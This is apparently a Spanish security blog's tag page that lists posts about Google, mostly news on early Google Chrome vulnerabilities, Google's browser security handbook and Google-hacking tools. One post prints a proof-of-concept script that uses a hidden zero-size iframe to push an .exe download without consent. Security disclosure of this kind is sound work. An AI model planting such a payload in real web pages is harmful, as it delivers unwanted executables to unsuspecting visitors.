> Entries (RSS)

Post con el tag ‘‘ Google ’’

Dic 11

Google libera el Manual de Seguridad para el Navegador Publicada por DragoN en Artículos sobre seguridad, Documentacion .

Manual de Google seguridad para el Navegador

Google publicó el Manual de Seguridad del navegador para el público en general. El documento des 60 páginas proporciona una amplia comparación de un amplio conjunto de características de seguridad y características de uso común en los navegadores, junto con útiles comentarios y sugerencias de aplicación para los desarrolladores que necesitan confiar en estos mecanismos.

El texto proporciona a los desarrolladores de aplicaciones web, navegadores, y los investigadores de seguridad una guia de referencia a las principales propiedades de seguridad de los navegadores web.  La insuficiente comprensión de estas a menudo mal documentados características es un importante factor que contribuye a la prevalencia de varias clases de vulnerabilidades de seguridad. Leer el resto de la entrada »

Sep 4

Muy Bonito, Muy de la Casa, MUY INSEGURO Publicada por DragoN en Noticias Seguridad, Seguridad Web .

El Nuevo Navegador de Google puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en Google Chrome que permite descargar archivos (de cualquier tipo) sin el consentimiento del usuario.

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de windows y  haciendo click aquí obtendrás algo parecido a esto.

Google Chrome

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

Google Chrome Inseguro

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome

Sep 3

Nueva Vulnerabilidad en Google Chrome Publicada por DragoN en Noticias Seguridad, Seguridad Web .

Google Chrome Logo

Ayer les comentaba sobre la Primera Vulnerabilidad en Google Chrome, hoy Rishi Narang ha descubierto una nueva vulnerabilidad que permite bloquear TODAS las pestañas de el ya famoso Navegador de Google.

El fallo radica en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador (ver imagen). Leer el resto de la entrada »

Sep 2

Primera Vulnerabilidad en Google Chrome Publicada por DragoN en Noticias Seguridad, Seguridad Web .

Vulnerabilidad en Google Chrome

No ha pasado ni 24 horas desde que google anuncio oficialmente su navegador “Google Chrome” y ya ha sido detectada la primera Vulnerabilidad en este.

Google Chrome es  vulnerable a “carpet bombing“, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource  Webkit (Base del navegador Google Chrome y Safari) que permite descargar automáticamente archivos cuando el usuario navega por una página maliciosa. Leer el resto de la entrada »

Ago 22

何可欣 He Kexin Tiene 14 o 16?? Publicada por Cronopio en Noticias Seguridad, Variado .

Image Hosted by ImageShack.us

Gran controversia a levantado la pequeña gimnasta olímpica He Kexin por el hecho de que según su pasaporte y la Fédération Internationale de Gymnastique (FIG) su fecha de nacimiento es Enero 1 de 1992 sin embargo algunas pequeñas investigaciones en Google podrían mostrar algo como Enero 1 de 1994.

La investigación se puede ver en algunos posts del blog de Stryde un consultor informático en defensa de la seguridad de la información.

Según Stryde si hacemos unas pequeñas búsquedas usando buscadores web podemos encontrar las discrepancias de fechas que han levantado está controversia.

Leer el resto de la entrada »

Feb 24

GoolagScan - Google Hacking ahora mas fácil Publicada por DragoN en Herramientas Seguridad .

Logo Coult of Dead Cow

El grupo “The cult of the Dead Cow”, que hace 10 años creó el famoso troyano Back Orifice, presentó hace algunos días una nueva herramienta de seguridad llamada Goolag. Leer el resto de la entrada »

Nov 21

Usando Google para descifrar Password MD5 Publicada por DragoN en Herramientas Seguridad .

En slashdot leo la noticia de un “analista de seguridad” el cual fue defaceado por no actualizar su instalación de WordPress… resulta que el cracker creó un usuario en el sistema y el analista saco la clave encriptada en MD5, la puso en google y el resultado obtenido le sorprendió.

Google Crackeador de MD5 Leer el resto de la entrada »

Nov 20

Google Pirata Publicada por DragoN en Noticias Seguridad .

Si existia SanGoogle era de esperarse que sacaran el Google Pirata, Google Pirata es un portal que utiliza el motor de este popular buscador para encontrar Torrents, Music, Video, Albums, Software, eBooks, Ringtones, Comics, Roms, NZB, Web.

GooglePirata Leer el resto de la entrada »

Jun 29

El Buscador Definitivo para Rapidshare, Megaupload y mas Publicada por DragoN en Variado .

Jun 3

Google ha sido “Hackeado” Publicada por DragoN en Noticias Seguridad .

googleholesy8 Google ha sido “Hackeado”

Leo en google.dirson durante unas horas se pudo acceder, a través de esta URL, a un directorio no protegido de uno de los servidores de Google, en el cual se podía navegar por sus contenidos.

Por alguna razón desconocida, van den Heetkamp pudo acceder a estos contenidos y, de hecho, en este archivo comparte con nosotros algunos de los documentos que encontró. Así, podemos descubrir por ejemplo ’schema.sql’, donde se crean una serie de tablas de mySQL de la Base de Datos ‘dbRemoveUrl’, y destinadas a almacenar algunos datos referentes a la eliminación de URLs, como información de los usuarios o de las páginas web a eliminar. Parece ser que, debido a restricciones de uso remoto de la Base de Datos, no se podía acceder a la información contenida en dichas tablas. Este no es el único caso en que Google utiliza mySQL para sus herramientas, y por ejemplo el sistema publicitario AdWords también lo emplea para almacenar datos de anunciantes. Leer el resto de la entrada »

« Entradas anteriores

  • Acerca de...

    DragonJAR.org es una comunidad de investigadores, estudiantes, profesionales y entusiastas de la Seguridad Informática, En la cual se busca darle un enfoque eminentemente práctico a la teoría sin olvidar las bases esenciales de esta.

    De esta manera se Tratará de ofrecer soluciones útiles a los usuarios, tanto novatos, estudiantes, como a los profesionales e investigadores, Teniendo presente que el mundo de la seguridad informática y la información es un medio que se auto inventa constantemente.